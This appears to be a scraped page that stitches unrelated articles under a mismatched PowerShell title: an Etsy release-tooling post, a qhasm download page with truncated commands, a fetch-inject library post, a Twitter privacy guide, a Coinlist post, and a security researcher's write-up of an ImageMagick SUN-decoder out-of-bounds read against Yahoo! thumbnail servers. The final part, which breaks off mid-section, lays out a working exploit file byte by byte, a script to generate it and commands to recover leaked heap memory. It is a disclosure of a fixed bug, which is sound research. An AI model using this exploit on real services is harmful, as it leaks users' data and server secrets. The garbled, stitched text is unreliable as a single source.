
The increased use of PowerShell in attacks [pdf]


How Etsy Ships Apps

In which Etsy transforms its app release process by aligning it with its philosophy for web deploys

illustration of a boat on a wave. There are several people in the boat, and the boat has a flag with an "E" on it.

Anchors Aweigh

Deploying code should be easy. It should happen often, and it should involve the engineers who wrote the code. For Etsyweb, this looks like continuous deployment.

A group of engineers (which we call a push train) and a designated driver all shepherd their changes to a staging environment, and then to production. At each checkpoint along that journey, the members of the push train are responsible for testing their changes, sharing that they’re ready to ship, and making sure nothing broke. Everyone in that train must work together for the safe completion of their deployment. And this happens very frequently: up to 50 times a day.

                                               TOPIC: clear
 mittens> .join                                TOPIC: mittens
   sasha> .join with mittens                   TOPIC: mittens + sasha
 pushbot> mittens, sasha: You're up            TOPIC: mittens + sasha
   sasha> .good                                TOPIC: mittens + sasha*
 mittens> .good                                TOPIC: mittens* + sasha*
 pushbot> mittens, sasha: Everyone is ready    TOPIC: mittens* + sasha*
  nassim> .join                                TOPIC: mittens* + sasha* | nassim
 mittens> .at preprod                          TOPIC: <preprod> mittens + sasha | nassim
 mittens> .good                                TOPIC: <preprod> mittens* + sasha | nassim
   sasha> .good                                TOPIC: <preprod> mittens* + sasha* | nassim
 pushbot> mittens, sasha: Everyone is ready    TOPIC: <preprod> mittens* + sasha* | nassim
 mittens> .at prod                             TOPIC: <prod> mittens + sasha | nassim
 mittens> .good                                TOPIC: <prod> mittens* + sasha | nassim
     asm> .join                                TOPIC: <prod> mittens* + sasha | nassim + asm
   sasha> .good                                TOPIC: <prod> mittens* + sasha* | nassim + asm
     asm> .nm                                  TOPIC: <prod> mittens* + sasha* | nassim
 pushbot> mittens, sasha: Everyone is ready    TOPIC: <prod> mittens* + sasha* | nassim
 mittens> .done                                TOPIC: nassim
 pushbot> nassim: You're up                    TOPIC: nassim
    lily> .join                                TOPIC: nassim | lily

This strategy has been successful for a lot of reasons, but especially because each deploy is handled by the people most familiar with the changes that are shipping. Those who wrote the code are in the best position to recognize when it breaks, and then fix it. Because of that, developers should be empowered to deploy code as needed, and remain close to its rollout.

App releases are a different beast. They don’t easily adapt to that philosophy of deploying code. For one, they have versions and need to be compiled. And since they’re distributed via app stores, those versions can take time to reach end users. Traditionally, these traits have led to strategies involving release branches and release managers. Our app releases started out this way, but we learned quickly that they didn’t feel very Etsy. And so we set out to change them.

Jen and Sasha

photo of Sasha Friedenberg and Jen Macchiarelli

We were the release managers. Jen managed the Sell on Etsy apps, and I managed the Etsy apps. We were responsible for all release stage transitions, maintaining the schedule, and managing all the communications around releases. We were also responsible for resolving conflicts and coordinating cross-team resources in cases of bugs and urgent blockers to release.

Ready to Ship

A key part of our job was making sure everyone knew what they were supposed to do and when they were supposed to do it. The biggest such checkpoint is when a release branches — this is when we create a dedicated branch for the release off master, and master becomes the next release. This is scheduled and determines what changes make it into production for a given release. It’s very important to make sure that those changes are expected, and that they have been tested.

For Jen and me, it would’ve been impossible to keep track of the many changes in a release ourselves, and so it was our job to coordinate with the engineers that made the actual changes and make sure those changes were expected and tested. In practice, this meant sending emails or messaging folks when approaching certain checkpoints like branching. And likewise, if there were any storm warnings (such as show-stopping bugs), it was our responsibility to raise the flag to notify others.

list of words indicating various responsibilities for release managers

Then Jen left Etsy for another opportunity, and I became a single point of failure and a gatekeeper. Every release decision was funneled through me, and I was the only person able to make and execute those decisions.

I was overwhelmed. Frustrated. I was worried I’d be stuck navigating iTunes Connect and Google Play, and sending emails. And frankly, I didn’t want to be doing those things. I wanted those things to be automated. Give me a button to upload to iTunes Connect, and another to begin staged rollout on Google Play. Thinking about the ease of deploying on web just filled me with envy.

This time wasn’t easy for engineers either. Even back when we had two release managers, from an engineer’s perspective, this period of app releases wasn’t transparent. It was difficult to know what phase of release we were in. A large number of emails was sent, but few of them were targeted to those that actually needed them. We would generically send emails to one big list that included all four of our apps. And all kinds of emails would get sent there. Things that were FYI-only, and also things that required urgent attention. We were on the path to alert-fatigue.

All of this meant that engineers felt more like they were in the cargo hold, rather than in the cockpit. But that just didn’t fit with how we do things for web. It didn’t fit with our philosophy for deployment. We didn’t like it. We wanted something better, something that placed engineers in front of the tiller.

Ship

screenshot showing Etsy's Ship's main page

So we built a vessel that coordinates the status, schedule, communications, and deploy tools for app releases. Here’s how Ship helps:

  • Keeps track of who committed changes to a release
  • Sends Slack messages and emails to the right people about the relevant events
  • Manages the state and schedule of all releases

It’s hard to imagine all of that abstractly, so here’s an example:

Captain’s Log

Monday

  • A cron moves the release into “Testing” and generates testing build v4.64.0.52.
  • Ship is notified of this and sends an email to Alicia with the build.
  • Alicia installs the build, verifies her changes, and tells Ship she’s ready.

Tuesday

Wednesday

  • The final testing finds no show-stopping issues
  • A cron submits v4.64.0 to iTunes Connect for review.

Friday

  • A cron checks iTunes Connect for the review status of this release, and updates Ship that it’s been approved.
  • Ship emails Alicia and others letting them know the release is approved.

Tuesday

  • A cron releases v4.64.0.
    (Had Alicia committed to our Android app, a cron would instead begin staged rollout on Google Play.)
  • Ship emails Alicia and others letting them know the release is out in production.

Wednesday

  • Ship emails a report of top crashes to all the engineers in the release (including Alicia)

Before Ship, all of the steps above would’ve been performed manually. But you’ll notice that release managers are missing from the above script; have we replaced release managers with all the automation in Ship?

photo of Etsy listing featuring a flag used by nautical ships to communicate: the flag says "I require a pilot"

Release Drivers

Partially. Ship has a feature where each release is assigned a driver.

screenshot showing Etsy's Ship's driver section. The driver in this case is Hannah Mittelstaedt

This driver is responsible for a bunch of things that we couldn’t or shouldn’t automate. Here’s what they’re responsible for:

  • Schedule changes
  • Shepherding ‘ready to ships’ from other engineers
  • Investigating showstopping bugs before release

Everything else? That’s automated. Branching, release candidate generation, submission to iTunes Connect — even staged rollout on Google Play! But, we’ve learned from automation going awry before. By default, some things are set to manual. There are others for which Ship explicitly does not allow automation, such as continuing staged rollout on Google Play. Things like this should involve and require human interaction. For everything else that is automated, we added a failsafe: at any time, a driver can disable all the crons and take over driving from autopilot:

screenshot of Etsy's Ship showing the various automation options that can be set on a per-releases basis.

When a driver wants to do something manually, they don’t need access to iTunes Connect or Google Play, as each of these things is made accessible as a button. A really nice side effect of this is that we don’t have to worry about provisioning folks for either app store, and we have a clear log of every release-related action taken by drivers.

Drivers are assigned once a release moves onto master, and are semi-randomly selected based on previous drivers and engineers that have committed to previous releases. Once assigned, we send them an onboarding email letting them know what their responsibilities are:

screenshot of Etsy's Ship's driver onboarding email

Ready to Ship Again

The driver can remain mostly dormant until the day of branching. A couple hours before we branch, it’s the driver’s responsibility to make sure that all the impacting engineers are ready to ship, and to orchestrate efforts when they’re not. After we’re ready, the driver’s responsibility is to remain available as a point-of-contact while final testing takes place. If an issue comes up, the driver may be consulted for steps to resolve.

And then, assuming all goes well, comes release day. The driver can opt to manually release, or let the cron do this for them — they’ll get notified if something goes wrong, either way. Then a day after we release, the driver looks at all of our dashboards, logs, and graphs to confirm the health of the release.

Bugfixes

But not all releases are planned. Things fail, and that’s expected. It’s naïve to assume some serious bug won’t ship with an app release. There are plenty of things that can and will be the subject of a post-mortem. When one of those things happens, any engineer can spawn a bugfix release off the most-recently-released mainline release.

diagram showing how a bugfix branch comes off of an existing release branch and not master

The engineer that requests this bugfix gets assigned as the driver for that release. Once they branch the release, they make the necessary bugfixes (others can join in to add bugfixes too, if they coordinate with the driver) in the release’s branch, build a release candidate, test it, and get it ready for production. The driver can then release it at will.

State Machine

Releases are actually quite complicated.

diagram indicating the state machine that powers Etsy's Ship

It starts off as an abstract thing that will occur in the future. Then it becomes a concrete thing actively collecting changes via commits on master in git. After this period of collecting commits, the release is considered complete and moves into its own dedicated branch. The release candidate is then built from this dedicated branch, thoroughly tested, and moved into production. The release itself then concludes as an unmerged branch.

Once a release branches, the next future release moves onto master. Each release is its own state machine, where the development and branching states overlap between successive releases.
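To make that overlap concrete, here is a minimal sketch of such a state machine in Python. This is illustrative only, not Etsy’s actual implementation, and the state names are assumptions drawn from this post:

    # Hypothetical release lifecycle; states and ordering are inferred from the text above.
    RELEASE_STATES = [
        'future',       # abstract, not yet collecting commits
        'development',  # collecting commits on master
        'branched',     # moved to its own dedicated release branch
        'testing',      # release candidate built and under test
        'submitted',    # sent off for app store review
        'released',     # live in production
    ]

    NEXT_STATE = dict(zip(RELEASE_STATES, RELEASE_STATES[1:]))

    def advance(state):
        """Move a release to its next state; a released branch is terminal (and unmerged)."""
        if state not in NEXT_STATE:
            raise ValueError('release is already terminal: %s' % state)
        return NEXT_STATE[state]

For example, advance('development') returns 'branched', at which point the next release’s own machine can enter 'development'.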

Notifications: Slack and Email

screenshot showing a notification sent via Slack

Plugged into the output of Ship are notifications. Because there are so many points of interest en route to production, it’s really important that the right people are notified at the right times. So we use the state machine of Ship to send out notifications to engineers (and other subscribers) based on how much they asked to know, and how they impacted the release. We also allow anyone to sign up for notifications around a release. This is used by product managers, designers, support teams, engineering managers, and more. Our communications are very targeted to those that need or want them.

In terms of what they asked to know, we made it very simple to get detailed emails about state changes to a release:

screenshot of Etsy's Ship showing the subscription options for engineers and non-engineers on a per-release basis

In terms of how they impacted the release, we need to get that data from somewhere else.

Git

We mentioned data Ship receives from outside sources. At Etsy, we use GitHub for our source control. Our apps have repos per-platform (Android and iOS). In order to keep Ship’s knowledge of releases up-to-date, we set up GitHub Webhooks to notify Ship whenever changes are pushed to the repo. We listen for two changes in particular: pushes to master, and pushes to any release branch.

When Ship gets notified, it iterates through the commits and uses the author, changed paths, and commit message to determine which app (buyer or seller) the commit affects, and which release we should attribute this change to. Ship then takes all of that and combines it into a state that represents every engineer’s impact on a given release. Is that engineer “user-impacting” or “dark” (our term for changes that aren’t live)? Ship then uses this state to determine who is a member of what release, and who should get notified about what events.
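As a rough sketch of that attribution step (illustrative Python, not Ship’s real code; the path prefixes and the commit-message convention here are assumptions):

    # Digest a GitHub push webhook payload into per-engineer, per-app impact.
    def summarize_push(payload):
        impacts = {}  # (author email, app) -> 'user-impacting' or 'dark'
        for commit in payload.get('commits', []):
            author = commit['author']['email']
            paths = commit.get('added', []) + commit.get('modified', []) + commit.get('removed', [])
            # Assumption: directory prefixes distinguish the buyer and seller apps.
            app = 'seller' if any(p.startswith('seller/') for p in paths) else 'buyer'
            # Assumption: engineers can flag non-user-facing work in the commit message.
            impact = 'dark' if '[dark]' in commit['message'].lower() else 'user-impacting'
            impacts[(author, app)] = impact
        return impacts

Ship would then fold a summary like this into its per-release membership state, and the notification rules above key off of it.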

Additionally, at any point during a release, an engineer can change their status. They may want to do this if they want to receive more information about a release, or if Ship misunderstood one of their commits as being impacting to the release.

Deployinator

Everything up until now has explained how Ship keeps track of things. But there’s been no explanation of how some of the automated actions affecting the app repo, or things outside Etsy, actually occur.

We have a home-grown tool for managing deploys called Deployinator, and we added app support. It can now perform mutating interactions with the app repos, as well as all the deploy actions related to Google Play and iTunes Connect. This is where we build the testing candidates, release candidate, branch the release, submit to iTunes Connect, and much more.

We opted to use Deployinator for a number of reasons:

  • Etsy engineers are already familiar with it
  • It’s our go-to environment for wrapping up a build process into a button
  • Good for things that need individual run logs, and clear failures

In our custom stack, we have crons. This is how we branch on Tuesday evening (assuming everyone is ready). This is where we interface with Google Play and iTunes Connect. We make use of Google Play’s official API in a custom Python module we wrote, and for iTunes Connect we use Spaceship to interface with the unofficial API.
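Etsy’s Google Play module isn’t public, and it predates v3 of the publishing API, but for a rough idea of what driving a staged rollout through the official API can look like, here is a sketch using google-api-python-client; the package name, version code and rollout fraction are placeholders:

    from googleapiclient.discovery import build

    def start_staged_rollout(creds, package='com.example.app', version_code='4640052', fraction=0.1):
        # Open an "edit", point the production track at a staged (inProgress) release, commit.
        service = build('androidpublisher', 'v3', credentials=creds)
        edit_id = service.edits().insert(packageName=package, body={}).execute()['id']
        service.edits().tracks().update(
            packageName=package, editId=edit_id, track='production',
            body={'releases': [{'versionCodes': [version_code],
                                'status': 'inProgress',   # staged rollout
                                'userFraction': fraction}]},
        ).execute()
        service.edits().commit(packageName=package, editId=edit_id).execute()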

Seaworthy

The end result of Ship is that we’ve distributed release management. Etsy no longer has any dedicated release managers. But it does have an engineer who used to be one — and I even get to drive a release every now and then.

People cannot be fully automated away. That applies to our web deploys, and is equally true for app releases. Our new process works within that reality. It’s unique because it pushes the limit of what we thought could be automated. Yet, at the same time, it empowers our app engineers more than ever before. Engineers control when a release goes to prod. Engineers decide if we’re ready to branch. Engineers hit the buttons.

And that’s what Ship is really about. It empowers our engineers to deliver the best apps for our users. Ship puts engineers at the helm.


Qhasm: tools to help write high-speed software

qhasm: tools to help write high-speed software
D. J. Bernstein
There's a mailing list for discussions among potential qhasm users ("How could I do this with qhasm?"), actual qhasm users ("Here's a .q file I wrote"), potential users of software produced by qhasm ("Can you qhasm people speed up this time-critical function for me?"), and qhasm contributors ("Here's a new machine description"). To subscribe, send an empty message to qhasm-subscribe@list.cr.yp.to.

One introduction to qhasm is the following short talk that I gave: 2005.02.21, "Have any challenges for qhasm?" The online notes for my Fall 2006 course on high-speed cryptography included a much more detailed example of using qhasm to write software for a serious cryptographic application.

WARNING WARNING WARNING: qhasm is in prototype form. The existing qhasm tools and interfaces have produced high-speed professional-quality software for several applications, but they are not themselves professional-quality tools; they have many known deficiencies and many sharp corners. Each of the qhasm tools has at least one complete rewrite planned. The .q language is not stable; if you write .q files then you should plan on having to modify them extensively for future qhasm releases. The machine-description language has a stable structure but is still undergoing tweaks; I can incorporate machine descriptions into qhasm and keep them up to date, but I won't promise that non-incorporated descriptions will continue to work. The prototypes of qhasm's cycle counter, range analyzer, and scheduler are several generations behind the current .q language and, as a practical matter, aren't usable right now.

Not scared? Okay. Here's how to download and compile the current prototypes of qhasm's instruction decoder, register allocator, x86-floating-point-stack handler, and assembler:

     wget http://cr.yp.to/qhasm/qhasm-20070207.tar.gz
     gunzip 
No installation script at this point.
To process .q files you'll need to be inside the qhasm compilation directory
to run ./qhasm-x86 etc.

Here are some examples of .q files (in some cases needing updates for the latest qhasm prototype!) and the resulting .s files:

Managing Async Dependencies with JavaScript

I’ve long been inspired by the work of Steve Souders. In 2009 he published an article titled Loading Scripts Without Blocking, which I first became aware of and studied during my time at Orbitz, where every millisecond a user waited for the page to load had a measurable impact on the business.

Steve’s work was instrumental for the Web development community, and even inspired Nicholas C. Zakas to write Loading JavaScript without Blocking the same month Steve’s book Even Faster Web Sites was published.

In his article, Steve covers six techniques for loading scripts without blocking:

  • XHR Eval,
  • XHR Injection,
  • Script in Iframe,
  • Script DOM Element,
  • Script Defer, and;
  • document.write Script Tag.

Web developers unfamiliar with the above techniques are more likely familiar with the async and defer attributes introduced with HTML5, which make it easier to load scripts without blocking the initial page render.

There’s an ugly gotcha, though, when loading scripts asynchronously. It occurs anytime dependent scripts are loaded. Loading asynchronous scripts with dependencies can lead to race conditions.

The problem lingers

To illustrate, let’s look at a popular open source UI framework inching its way toward general public use: Bootstrap 4.

Using Bootstrap 4 will require the following script dependencies: jQuery, Tether, and Bootstrap’s own JavaScript.

Of the three, two are required to load before Bootstrap itself. If these scripts were all loaded asynchronously using the async attribute, the resulting code might look something like this:

<script async src="https://cdn.jsdelivr.net/jquery/3.1.1/jquery.slim.min.js"></script>
<script async src="https://cdn.jsdelivr.net/tether/1.4.0/tether.min.js"></script>
<script async src="https://cdn.jsdelivr.net/bootstrap/4.0.0/js/bootstrap.min.js"></script>

This is where the trouble starts. Given the dependencies, if Bootstrap itself isn’t the last to finish downloading, it will execute as soon as it arrives, attempt to initialize itself, throw an undefined error and fail to initialize entirely.

What’s worse, the error will happen intermittently due to network conditions, making the cause of the race condition harder to detect.

To mitigate the problem, official Bootstrap prerelease documentation does what other major UI frameworks do, and simply does not promote use of the async attribute. This, in effect, punts the problem to userland and will leave many websites with not one, not two, but three scripts causing blocking behavior and jank in the UI.

Those who’re unaware of Steve’s work may not understand these shortcomings, and will likely copypasta Bootstrap’s code – along with the blocking behavior – directly into their source.

Others may choose to use a bundler to concatenate all of the JavaScript files into one or two packages, and load them asynchronously to avoid these problems, typically leading to an SEO-unfriendly Single-Page Application primed for Front-end SPOF.

What most don’t know though, is there’s a better way. And it doesn’t require any sacrifices to SEO, UX, speed or accessibility.

Introducing Fetch Inject

To help address the problem of loading scripts without blocking I created a JavaScript library called fetch-inject.

Fetch Inject introduces a new technique to the Web – let’s call it Fetch Injection – to dynamically inline assets into the DOM.

Here’s how it fits into Souders’ original script loading techniques:

  • XHR Eval,
  • XHR Injection,
  • Fetch Injection,
  • Script in Iframe,
  • Script DOM Element,
  • Script Defer, and;
  • document.write Script Tag.

Similar to XHR Injection, Fetch Injection loads a remote resource and inlines it into the DOM. Unlike XHR Injection, however, fetch-inject leverages the Fetch API instead of Ajax.

Here’s how fetch-inject can be used to load a script asynchronously and without the blocking behavior previously discussed:

fetchInject(['https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js'])

As you may have noticed, the fetchInject method takes an Array argument, allowing it to make parallel asynchronous downloads:

fetchInject([
  'https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js',
  'https://cdn.jsdelivr.net/momentjs/2.17.1/moment.min.js'
])

But why stop at scripts? Why not use it to inject stylesheets too:

fetchInject([
  'https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js',
  'https://cdn.jsdelivr.net/momentjs/2.17.1/moment.min.js',
  '//cdn.jsdelivr.net/fontawesome/4.7.0/css/font-awesome.min.css'
])

And because it uses fetch under the hood, it’s possible to couple async and synchronous code using then:

fetchInject([
  'https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js',
  'https://cdn.jsdelivr.net/momentjs/2.17.1/moment.min.js'
]).then(() => {
  console.log(
    `${_.capitalize(moment().endOf('year').fromNow())} we'll be heroes.`
  )
})

Which, in turn, enables async dependency management for loading JavaScript-driven UIs like Bootstrap 4 asynchronously and in parallel (including font icons):

fetchInject([
  'https://npmcdn.com/bootstrap@4.0.0-alpha.5/dist/js/bootstrap.min.js'
], fetchInject([
  'https://cdn.jsdelivr.net/jquery/3.1.1/jquery.slim.min.js',
  'https://npmcdn.com/tether@1.2.4/dist/js/tether.min.js',
  'https://cdn.jsdelivr.net/fontawesome/4.7.0/css/font-awesome.min.css'
]))

The fetch-inject library itself makes the Fetch Injection technique available to everyone via an easy-to-use API. It has no hard dependencies, is about 600 bytes minified and gzipped and comes at you ISC-licensed.

To get started, install the library from NPM with npm i fetch-inject or bower with bower install fetch-inject. Please see the README for additional installation options and more detail.

Looking back towards the future

It’s been a long-time coming, but things are starting to look up for the future of the Web thanks to ES6 and the Fetch API. And with HTTP/2 and ES6 modules right around the corner, expect to see more performant websites worldwide, available on more devices at connection speeds never before possible.

We’ve come a long way since Steve published Even Faster Websites, and there’s still a long way to go to make the Web accessible to everyone. But an accessible Web should be our primary goal. And new techniques like Fetch Injection will help get us there.

How to Opt Out of Twitter's New Privacy Settings

Since Wednesday night, Twitter users have been greeted by a pop-up notice about Twitter’s new privacy policy, which will come into effect June 18:

Contrary to the inviting “Sounds good” button to accept the new policy and get to tweeting, the changes Twitter has made around user tracking and data personalization do not sound good for user privacy. For example, the company will now record and store non-EU users’ off-Twitter web browsing history for up to 30 days, up from 10 days in the previous policy.

Worst of all, the “control over your data” promised by the pop-up is on an opt-out basis, giving users choices only after Twitter has set their privacy settings to invasive defaults.

Instead, concerned users have to click “Review settings” to opt out of Twitter’s new mechanisms for user tracking. That will bring you to the “Personalization and Data” section of your settings. Here, you can pick and choose the personalization, data collection, and data sharing you will allow—or, click “Disable all” in the top-right corner to opt out entirely.

If you already clicked through the privacy policy pop-up, you can still go into your settings to make these changes. After navigating to your settings, choose “Privacy and safety” on the left, and then click “Edit” next to “Personalization and data.”

While you’re at it, this is also a good opportunity to review, edit, and/or remove the data Twitter has collected on you in the past by going to the “Your Twitter data” section of your settings.

Twitter has stated that these granular settings are intended to replace Twitter’s reliance on Do Not Track. However, replacing a standard cross-platform choice with new, complex options buried in the settings is not a fair trade. Although “more granular” privacy settings sound like an improvement, they lose their meaning when they are set to privacy-invasive selections by default. Adding new tracking options that users are opted into by default suggests that Twitter cares more about collecting data than respecting users’ choice.

Coinlist

Some interesting developments that we have been working on came public yesterday.

  1. Protocol Labs, a company that builds blockchain-based protocols, laid out its ambitious roadmap and finally got around to announcing the seed investment USV and others made in it last year. My partner Brad Burnham wrote a blog post on USV.com explaining why we are so excited about Protocol Labs.
  2. Protocol Labs will be launching a token offering soon for Filecoin which powers a blockchain based storage network on top of its IPFS protocol.
  3. The Filecoin offering will be managed on a new platform called Coinlist which was built by Protocol Labs and AngelList.
  4. Coinlist will utilize a new kind of security called a SAFT (Simple Agreement for Future Tokens) that has been constructed to comply with existing securities regulations.

While all of these are interesting developments, particularly the architecture and roadmap that Protocol Labs laid out, I thought I would talk a bit about Coinlist given that it is “Funding Friday.”

Token Offerings have been going on for quite a while now. There are over 800 tokens listed on Coin Market Cap.

But US domiciled companies have not had a good way to raise money in token pre-sales and comply with existing securities laws. This forced a number of promising blockchain projects to domicile outside of the US, often in Switzerland, and organize as Foundations for tax reasons. A US domiciled company can wait until the token is live and functioning and sell it then, because at that point it is not a security, it is a token. But if you want to raise funds in a pre-sale for a US domiciled company, there has not been a good way to do that.

Enter Juan Benet, founder of Protocol Labs, and Naval Ravikant, founder of AngelList. They collaborated on CoinList and, with the help of a number of venture law firms and their investors, including USV, came up with the SAFT structure.

Naval put it like this in a Forbes piece yesterday on all of this:

ICOs are obviously a new and interesting form of funding for blockchain-based protocols. But it’s not clear that all of them comply with U.S. securities laws or that all of them are companies that have good native use cases for new coins. So, we wanted to use a high-quality coin and team to trailblaze a legal and compliant ICO.

If you are an accredited investor and want to participate in token pre-sales, check out Coinlist.

Dumping Yahoo authentication secrets with an out-of-bounds read

Overview

In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.

Visualization


The above patch of noise is a PNG (i.e. lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:

  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.

But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an up-to-date ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Box.com? Interestingly enough, the crash file doesn't seem to crash anything, but all the test files do seem to render instead of failing cleanly as would be expected with an up-to-date ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    sun_info.width=ReadBlobMSBLong(image);
    sun_info.height=ReadBlobMSBLong(image);
    sun_info.depth=ReadBlobMSBLong(image);
    sun_info.length=ReadBlobMSBLong(image);
[...]
    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
      ThrowReaderException(CorruptImageError,"ImproperImageHeader");
    bytes_per_line=sun_info.width*sun_info.depth;
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
      sizeof(*sun_data));
[...]
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)
      ThrowReaderException(CorruptImageError,"UnableToReadImageData");

    sun_pixels=sun_data;
    bytes_per_line=0;
[...]
    p=sun_pixels;
    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
      {
        q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
        if (q == (Quantum *) NULL)
          break;
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
        {
          for (bit=7; bit >= 0; bit--)
          {
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),
              q);
            q+=GetPixelChannels(image);
          }
          p++;
        }

So in the case of an image with a depth of 1, we see a fairly straightforward problem:

  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:


59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.
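For reference, that 40-byte file is easy to regenerate. Here's a small Python sketch of my own (not from the original write-up) that packs the same big-endian header fields followed by the 8 filler bytes:

    import struct

    # SUN raster header: eight big-endian 32-bit fields, then the image data.
    header = struct.pack(
        '>8I',
        0x59A66A95,  # magic
        256,         # width
        256,         # height
        1,           # depth: 1 bit per pixel
        8,           # image data length: far less than the (256*256)/8 bytes needed
        1,           # type: standard
        0,           # map type: none
        0,           # map length
    )
    with open('exploit.sun', 'wb') as f:
        f.write(header + b'A' * 8)  # the 8 bytes of "image data" (0x41)

Twiddling the fifth field is exactly the image data length knob described above.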

Exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the visualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human vision is more sensitive to brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00


Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.
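The same recovery can be sketched in plain Python with Pillow. This is an illustration of the idea rather than the author's tooling, and it assumes each JPEG pixel maps one-to-one onto an original 1-bit pixel, with dark pixels corresponding to set memory bits:

    from PIL import Image

    img = Image.open('yahoo_file.jpg').convert('L')  # greyscale, pixel values 0-255
    pixels = list(img.getdata())                     # row-major order

    recovered = bytearray()
    for i in range(0, len(pixels) - 7, 8):
        byte = 0
        for bit, px in enumerate(pixels[i:i + 8]):
            if px < 128:             # "mostly black" pixel: the memory bit was set
                byte |= 0x80 >> bit  # the first pixel in each group is the most significant bit
        recovered.append(byte)

    print(recovered[:32].hex())      # compare against the hex dump above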

The strings and secrets

